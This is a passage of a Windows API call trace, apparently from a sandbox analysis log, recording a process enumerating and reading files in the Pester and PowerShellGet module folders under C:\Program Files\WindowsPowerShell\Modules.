nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0226.790] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe0d0 | out: lpFindFileData=0x1b7fe0d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0226.790] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe0d0 | out: lpFindFileData=0x1b7fe0d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.790] FindClose (in: hFindFile=0x1a5cf5b0 | out: hFindFile=0x1a5cf5b0) returned 1 [0226.790] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe330) returned 1 [0226.790] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe2f0) returned 1 [0226.790] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.psd1")) returned 0xffffffff [0226.790] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.psm1")) returned 0xffffffff [0226.790] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.cdxml")) returned 0xffffffff [0226.791] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.xaml")) returned 0xffffffff [0226.791] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.dll")) returned 0xffffffff [0226.791] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x1b7fe100, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0226.791] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe540) returned 1 [0226.791] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester" (normalized: "c:\\program files\\windowspowershell\\modules\\pester"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe620 | out: lpFileInformation=0x1b7fe620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0226.791] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe500) returned 1 [0226.791] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe570) returned 1 [0226.791] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x1b7fe060, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0226.791] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", lpFilePart=0x0) returned 0x32 [0226.791] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*", lpFindFileData=0x1b7fe210 | out: lpFindFileData=0x1b7fe210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf5b0 [0226.792] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.792] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0226.792] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.792] FindClose (in: hFindFile=0x1a5cf5b0 | out: hFindFile=0x1a5cf5b0) returned 1 [0226.792] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe4c0) returned 1 [0226.792] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe480) returned 1 [0226.792] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0x1b7fe170, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0226.792] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe5b0) returned 1 [0226.792] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe690 | out: lpFileInformation=0x1b7fe690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5)) returned 1 [0226.792] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe570) returned 1 [0226.793] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0x1b7fde70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0226.793] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe350) returned 1 [0226.793] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x564 [0226.793] GetFileType (hFile=0x564) returned 0x1 [0226.793] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe2c0) returned 1 [0226.793] GetFileType (hFile=0x564) returned 0x1 [0226.793] ReadFile (in: hFile=0x564, lpBuffer=0x2451828, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fe428, lpOverlapped=0x0 | out: lpBuffer=0x2451828*, lpNumberOfBytesRead=0x1b7fe428*=0x1000, lpOverlapped=0x0) returned 1 [0226.793] ReadFile (in: hFile=0x564, lpBuffer=0x2451828, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fe428, lpOverlapped=0x0 | out: lpBuffer=0x2451828*, lpNumberOfBytesRead=0x1b7fe428*=0x1000, lpOverlapped=0x0) returned 1 [0226.793] ReadFile (in: hFile=0x564, lpBuffer=0x2451828, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fe428, lpOverlapped=0x0 | out: lpBuffer=0x2451828*, lpNumberOfBytesRead=0x1b7fe428*=0x1000, lpOverlapped=0x0) returned 1 [0226.794] ReadFile (in: hFile=0x564, lpBuffer=0x2451828, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fe428, lpOverlapped=0x0 | out: lpBuffer=0x2451828*, lpNumberOfBytesRead=0x1b7fe428*=0x5e5, lpOverlapped=0x0) returned 1 [0226.794] ReadFile (in: hFile=0x564, lpBuffer=0x2450d4d, nNumberOfBytesToRead=0x21b, lpNumberOfBytesRead=0x1b7fe428, lpOverlapped=0x0 | out: lpBuffer=0x2450d4d*, lpNumberOfBytesRead=0x1b7fe428*=0x0, lpOverlapped=0x0) returned 1 [0226.794] ReadFile (in: hFile=0x564, lpBuffer=0x2451828, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fe428, lpOverlapped=0x0 | out: lpBuffer=0x2451828*, lpNumberOfBytesRead=0x1b7fe428*=0x0, lpOverlapped=0x0) returned 1 [0226.794] CloseHandle (hObject=0x564) returned 1 [0226.796] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psd1")) returned 0xffffffff [0226.796] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psm1")) returned 0xffffffff [0226.796] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.cdxml")) returned 0xffffffff [0226.796] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.xaml")) returned 0xffffffff [0226.796] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.dll")) returned 0xffffffff [0226.797] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.797] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0226.797] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\", lpFilePart=0x0) returned 0x39 [0226.797] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf5b0 [0226.797] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.799] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0226.799] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.799] FindClose (in: hFindFile=0x1a5cf5b0 | out: hFindFile=0x1a5cf5b0) returned 1 [0226.799] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.799] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.799] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.799] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0226.800] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\", lpFilePart=0x0) returned 0x39 [0226.800] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf5b0 [0226.800] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.800] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0226.800] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 0 [0226.800] FindClose (in: hFindFile=0x1a5cf5b0 | out: hFindFile=0x1a5cf5b0) returned 1 [0226.800] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.801] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.801] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe380) returned 1 [0226.801] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x1b7fde70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0226.801] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\", nBufferLength=0x105, lpBuffer=0x1b7fde10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\", lpFilePart=0x0) returned 0x41 [0226.801] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\*", lpFindFileData=0x1b7fe020 | out: lpFindFileData=0x1b7fe020*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf5b0 [0226.801] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.801] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0226.802] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet.psd1", cAlternateFileName="POWERS~1.PSD")) returned 1 [0226.802] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Format.ps1xml", cAlternateFileName="PSGETF~1.PS1")) returned 1 [0226.802] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x143ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Resource.psd1", cAlternateFileName="PSGETR~1.PSD")) returned 1 [0226.802] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 1 [0226.802] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 0 [0226.802] FindClose (in: hFindFile=0x1a5cf5b0 | out: hFindFile=0x1a5cf5b0) returned 1 [0226.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe2d0) returned 1 [0226.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe290) returned 1 [0226.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe380) returned 1 [0226.803] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x1b7fde70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0226.803] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\", nBufferLength=0x105, lpBuffer=0x1b7fde10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\", lpFilePart=0x0) returned 0x41 [0226.803] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\*", lpFindFileData=0x1b7fe020 | out: lpFindFileData=0x1b7fe020*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf5b0 [0226.803] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.803] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0226.804] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, 